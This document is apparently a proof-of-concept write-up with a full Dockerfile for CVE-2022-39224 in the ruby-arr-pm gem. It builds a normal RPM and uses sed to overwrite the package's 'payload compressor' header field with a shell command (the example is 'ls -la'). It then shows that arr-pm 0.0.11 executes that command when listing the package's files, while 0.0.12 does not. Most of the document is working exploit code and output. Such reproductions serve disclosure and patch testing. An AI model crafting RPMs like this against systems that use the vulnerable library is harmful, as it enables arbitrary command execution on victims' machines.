I don't found an example of POC for this CVE of ruby-arr-pm 0.0.11, so I build one using a Docker container.
- Arbitrary shell execution when extracting or listing files contained in a malicious rpm. (CVE-2022-39224)
- PentesterLab > CVE-2022-39224
$ docker build -t cve-2022-39224:poc . && docker run -it cve-2022-39224:poc
RPM BUILD
* .spec
BuildArch: noarch
Summary: Regular RPM
Name: regular
Version: 1
Release: 0
License: MIT
%description
A regular RPM
%files
/script-01.sh
/script-02.sh
%install
cp /root/rpmbuild/SOURCES/* /root/rpmbuild/BUILD/regular-1-build/BUILDROOT/
* rpm
total 8
-rw-r--r-- 1 root root 6751 Jun 24 10:47 regular-1-0.noarch.rpm
* files
/script-01.sh
/script-02.sh
* payloadcompressor
zstd
POC
* change "payload compressor" field by any OS command, example: ls -la
581522be9cb2eca076b5266ab355e794 regular.rpm
6f6dceedd471c3c61a8e6b1edf405c5a poc.rpm
poc.rpm is now a broken rpm but arr-pm don't care!
error: poc.rpm: region trailer: BAD, tag 1714501120 type 63 offset -7 count -816
error: poc.rpm: not an rpm package (or package manifest)
ARR-PM 0.0.11
* install
Fetching arr-pm-0.0.11.gem
Fetching cabin-0.9.0.gem
Successfully installed cabin-0.9.0
Successfully installed arr-pm-0.0.11
2 gems installed
* regular.rpm files
/script-01.sh
/script-02.sh
* poc.rpm files
total 32
drwxr-xr-x 1 root root 4096 Jun 24 10:47 .
dr-xr-x--- 1 root root 4096 Jun 24 10:47 ..
-rw-r--r-- 1 root root 176 Jun 24 10:21 poc.rb
-rw-r--r-- 1 root root 6755 Jun 24 10:47 poc.rpm
-rw-r--r-- 1 root root 6751 Jun 24 10:47 regular.rpm
ARR-PM 0.0.12
* install
Fetching arr-pm-0.0.12.gem
Successfully installed arr-pm-0.0.12
1 gem installed
* regular.rpm files
/script-01.sh
/script-02.sh
* poc.rpm files
/script-01.sh
/script-02.sh
# https://github.com/jordansissel/ruby-arr-pm/security/advisories/GHSA-88cv-mj24-8w3q
# docker build -t cve-2022-39224:poc . && docker run -it cve-2022-39224:poc
FROM rubydistros/fedora-latest:3.1
RUN yum -y install rpm-build
WORKDIR /root/rpmbuild/SOURCES
COPY <<'EOF' script-01.sh
#!/bin/sh
echo "I'm a script: $0"
EOF
RUN cp script-01.sh script-02.sh
WORKDIR /root/rpmbuild/SPECS
COPY <<EOF rpm.spec
BuildArch: noarch
Summary: Regular RPM
Name: regular
Version: 1
Release: 0
License: MIT
%description
A regular RPM
%files
/script-01.sh
/script-02.sh
%install
cp /root/rpmbuild/SOURCES/* /root/rpmbuild/BUILD/regular-1-build/BUILDROOT/
EOF
WORKDIR /root/poc
COPY <<EOF poc.rb
require 'arr-pm'
regular = RPM::File.new('regular.rpm')
puts "* regular.rpm files"
puts regular.files
poc = RPM::File.new('poc.rpm')
puts
puts "* poc.rpm files"
puts poc.files
EOF
WORKDIR /root/
COPY --chmod=700 <<'EOF' ./entry.sh
echo
echo "RPM BUILD"
echo
cd rpmbuild
echo "* .spec"
cat ./SPECS/rpm.spec
rpmbuild -bb ./SPECS/rpm.spec > /dev/null 2>&1
echo
echo "* rpm"
ls -l RPMS/noarch/
cd ..
cd poc
cp ../rpmbuild/RPMS/noarch/regular-1-0.noarch.rpm regular.rpm
echo
echo "* files"
rpm -ql regular.rpm
echo
echo "* payloadcompressor"
rpm -qp regular.rpm --qf "%{PAYLOADCOMPRESSOR}"
echo
echo
echo "POC"
echo
cp regular.rpm poc.rpm
CMD='ls -la'
echo '* change "payload compressor" field by any OS command, example: '$CMD
sed -i "s~zstd~$CMD #~" poc.rpm
md5sum regular.rpm poc.rpm
echo
echo "poc.rpm is now a broken rpm but arr-pm don't care!"
rpm -qp poc.rpm --qf "%{PAYLOADCOMPRESSOR}"
echo
echo "ARR-PM 0.0.11"
echo
echo "* install"
gem install arr-pm -v 0.0.11
echo
ruby poc.rb
echo
echo "ARR-PM 0.0.12"
echo
echo "* install"
gem install arr-pm -v 0.0.12
echo
ruby poc.rb
echo
/bin/bash
EOF
ENTRYPOINT ./entry.sh